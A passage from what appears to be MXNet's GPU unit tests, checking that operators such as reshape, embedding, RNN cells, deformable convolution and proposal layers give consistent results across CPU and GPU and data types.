'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
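    # In Reshape, 0 keeps the corresponding input dimension and -1 infers the remaining
    # size, so the (2, 2, 2, 10) inputs below become (8, 1, 1, 10).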
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params, scale=0.1)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
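    # take gathers along axis 0 (the default), i.e. out[i, ...] = a[indices[i], ...];
    # the indices below are drawn in [0, data_shape[0]) so every lookup is in range.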
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
mx.test_utils.assert_allclose(mod1.get_outputs()[0], mod2.get_outputs()[0], rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
mx.test_utils.assert_allclose(args[bias_name], expected_bias)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
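    # Each ROI row is (batch_index, x1, y1, x2, y2) in input-image coordinates.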
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
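    # Each launch accumulates alpha * x into y in place, so the expected values below are
    # 0 + 3*1 = 3, then 3 + 4*1 = 7, then 7 + 5*1 = 12.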
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
            # no 100% guarantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), {'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
